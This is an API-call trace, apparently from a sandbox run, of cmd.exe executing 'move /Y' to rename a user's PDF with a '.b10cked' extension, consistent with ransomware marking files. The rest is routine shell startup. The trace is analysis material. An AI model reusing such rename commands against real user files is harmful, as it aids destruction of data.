[0140.087] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfc4c, dwLength=0x1c | out: lpBuffer=0x1cfc4c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0140.087] GetConsoleOutputCP () returned 0x1b5 [0140.087] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.087] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.087] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0140.087] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.087] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.087] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.087] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.087] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.088] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.088] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.088] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.088] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.088] GetEnvironmentStringsW () returned 0x2101d8* [0140.088] FreeEnvironmentStringsW (penv=0x2101d8) returned 1 [0140.088] GetEnvironmentStringsW () returned 0x2101d8* [0140.088] FreeEnvironmentStringsW (penv=0x2101d8) returned 1 [0140.088] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebec | out: phkResult=0x1cebec*=0x40) returned 0x0 [0140.088] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x0, lpData=0x1cebf8*=0x0, lpcbData=0x1cebf0*=0x1000) returned 0x2 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x4, lpData=0x1cebf8*=0x1, lpcbData=0x1cebf0*=0x4) returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x0, lpData=0x1cebf8*=0x1, lpcbData=0x1cebf0*=0x1000) returned 0x2 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: 
lpType=0x1cebf4*=0x4, lpData=0x1cebf8*=0x0, lpcbData=0x1cebf0*=0x4) returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x4, lpData=0x1cebf8*=0x40, lpcbData=0x1cebf0*=0x4) returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x4, lpData=0x1cebf8*=0x40, lpcbData=0x1cebf0*=0x4) returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x0, lpData=0x1cebf8*=0x40, lpcbData=0x1cebf0*=0x1000) returned 0x2 [0140.089] RegCloseKey (hKey=0x40) returned 0x0 [0140.089] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebec | out: phkResult=0x1cebec*=0x40) returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x0, lpData=0x1cebf8*=0x40, lpcbData=0x1cebf0*=0x1000) returned 0x2 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x4, lpData=0x1cebf8*=0x1, lpcbData=0x1cebf0*=0x4) returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x0, lpData=0x1cebf8*=0x1, lpcbData=0x1cebf0*=0x1000) returned 0x2 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x4, lpData=0x1cebf8*=0x0, lpcbData=0x1cebf0*=0x4) 
returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x4, lpData=0x1cebf8*=0x9, lpcbData=0x1cebf0*=0x4) returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x4, lpData=0x1cebf8*=0x9, lpcbData=0x1cebf0*=0x4) returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x0, lpData=0x1cebf8*=0x9, lpcbData=0x1cebf0*=0x1000) returned 0x2 [0140.089] RegCloseKey (hKey=0x40) returned 0x0 [0140.089] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0140.089] srand (_Seed=0x5b88636e) [0140.089] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked\"" [0140.089] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked\"" [0140.090] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.090] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x211938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.090] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.090] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, 
nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.090] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.090] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.090] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.090] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.090] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.090] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.090] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.090] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.090] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.090] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.090] GetEnvironmentStringsW () returned 0x212328* [0140.090] FreeEnvironmentStringsW (penv=0x212328) returned 1 [0140.090] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.090] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.090] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.090] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.091] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.091] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.091] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.091] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.091] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.091] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.091] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf9b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 
[0140.091] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf9b8, lpFilePart=0x1cf9b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf9b4*="Desktop") returned 0x18 [0140.091] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.091] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf734 | out: lpFindFileData=0x1cf734) returned 0x210068 [0140.091] FindClose (in: hFindFile=0x210068 | out: hFindFile=0x210068) returned 1 [0140.091] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf734 | out: lpFindFileData=0x1cf734) returned 0x210068 [0140.091] FindClose (in: hFindFile=0x210068 | out: hFindFile=0x210068) returned 1 [0140.091] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf734 | out: lpFindFileData=0x1cf734) returned 0x210068 [0140.091] FindClose (in: hFindFile=0x210068 | out: hFindFile=0x210068) returned 1 [0140.091] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.092] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.092] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.092] GetEnvironmentStringsW () returned 0x212b48* [0140.092] FreeEnvironmentStringsW (penv=0x212b48) returned 1 [0140.092] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.092] GetConsoleOutputCP () returned 0x1b5 [0140.092] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.092] GetUserDefaultLCID () returned 0x409 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.093] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x23, lpLCData=0x1cfaf8, cchData=128 | out: lpLCData="0") returned 2 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfaf8, cchData=128 | out: lpLCData="0") returned 2 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfaf8, cchData=128 | out: lpLCData="1") returned 2 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.093] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.094] GetConsoleTitleW (in: lpConsoleTitle=0x200918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.095] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.095] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.095] GetProcAddress 
(hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.095] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.096] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.096] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0140.096] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0140.096] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.096] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.096] _wcsicmp (_String1="REM", _String2="move") returned 5 [0140.096] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.100] GetConsoleTitleW (in: lpConsoleTitle=0x1cf7f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.101] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0140.101] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0140.101] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0140.101] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0140.101] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0140.101] _wcsicmp (_String1="move", _String2="CD") returned 10 [0140.101] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0140.101] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0140.101] _wcsicmp (_String1="move", _String2="REN") returned -5 [0140.101] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0140.101] _wcsicmp (_String1="move", _String2="SET") returned -6 [0140.101] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0140.101] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0140.101] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0140.101] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0140.101] _wcsicmp (_String1="move", _String2="MD") returned 11 [0140.101] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0140.101] _wcsicmp (_String1="move", _String2="RD") returned -5 [0140.101] _wcsicmp 
(_String1="move", _String2="RMDIR") returned -5 [0140.101] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0140.101] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0140.101] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0140.101] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0140.101] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0140.101] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0140.101] _wcsicmp (_String1="move", _String2="VER") returned -9 [0140.101] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0140.101] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0140.101] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0140.101] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0140.101] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0140.102] _wcsicmp (_String1="move", _String2="START") returned -6 [0140.102] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0140.102] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0140.102] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0140.103] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.103] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.103] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf5ac, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf5a4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf5a4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", 
_MaxCount=0x7) returned 3 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 
[0140.105] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.105] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0140.105] _wcsicmp (_String1="THCV85~1.PDF", _String2=".") returned 70 [0140.105] _wcsicmp (_String1="THCV85~1.PDF", _String2="..") returned 70 [0140.106] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\thcv85~1.pdf")) returned 0x20 [0140.106] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x211ed0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.106] SetErrorMode (uMode=0x0) returned 0x0 [0140.106] SetErrorMode (uMode=0x1) returned 0x0 [0140.106] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF", nBufferLength=0x104, lpBuffer=0x1cef34, lpFilePart=0x1cef1c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF", lpFilePart=0x1cef1c*="THCV85~1.PDF") returned 0x36 [0140.106] SetErrorMode (uMode=0x0) returned 0x1 [0140.106] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1")) returned 0x12 [0140.106] _wcsicmp (_String1="THCV85~1.PDF", _String2=".") returned 70 [0140.106] _wcsicmp (_String1="THCV85~1.PDF", _String2="..") returned 70 [0140.106] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF" (normalized: 
"c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\thcv85~1.pdf")) returned 0x20 [0140.106] SetErrorMode (uMode=0x0) returned 0x0 [0140.106] SetErrorMode (uMode=0x1) returned 0x0 [0140.106] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF", nBufferLength=0x104, lpBuffer=0x1cf3b0, lpFilePart=0x1cf148 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF", lpFilePart=0x1cf148*="THCV85~1.PDF") returned 0x36 [0140.107] SetErrorMode (uMode=0x0) returned 0x1 [0140.107] SetErrorMode (uMode=0x0) returned 0x0 [0140.107] SetErrorMode (uMode=0x1) returned 0x0 [0140.107] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked", nBufferLength=0x104, lpBuffer=0x1cf5b8, lpFilePart=0x1cf148 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked", lpFilePart=0x1cf148*="Thcv85KW1KoWsUQP.pdf.b10cked") returned 0x46 [0140.107] SetErrorMode (uMode=0x0) returned 0x1 [0140.107] SetLastError (dwErrCode=0x0) [0140.107] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\thcv85kw1kowsuqp.pdf.b10cked")) returned 0xffffffff [0140.107] GetLastError () returned 0x2 [0140.107] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF", fInfoLevelId=0x1, lpFindFileData=0x1ceac4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceac4) returned 0x200f50 [0140.107] FindNextFileW (in: hFindFile=0x200f50, lpFindFileData=0x1ceac4 | out: lpFindFileData=0x1ceac4) returned 0 [0140.108] GetLastError () returned 0x12 [0140.108] FindClose (in: hFindFile=0x200f50 | out: hFindFile=0x200f50) returned 1 [0140.109] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF", fInfoLevelId=0x1, lpFindFileData=0x211c70, fSearchOp=0x0, 
lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x211c70) returned 0x200f50 [0140.109] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked", nBufferLength=0x104, lpBuffer=0x1ced5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked", lpFilePart=0x0) returned 0x46 [0140.109] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf", nBufferLength=0x104, lpBuffer=0x1ced5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf", lpFilePart=0x0) returned 0x3e [0140.109] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\thcv85kw1kowsuqp.pdf")) returned 0x20 [0140.109] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\thcv85kw1kowsuqp.pdf"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\thcv85kw1kowsuqp.pdf.b10cked"), dwFlags=0x3) returned 1 [0140.109] FindClose (in: hFindFile=0x200f50 | out: hFindFile=0x200f50) returned 1 [0140.109] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1ced10 | out: _Buffer=" 1") returned 9 [0140.110] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.110] GetFileType (hFile=0x7) returned 0x2 [0140.771] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.771] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cec9c | out: lpMode=0x1cec9c) returned 1 [0140.771] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.771] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1cecd0 | out: lpConsoleScreenBufferInfo=0x1cecd0) returned 1 
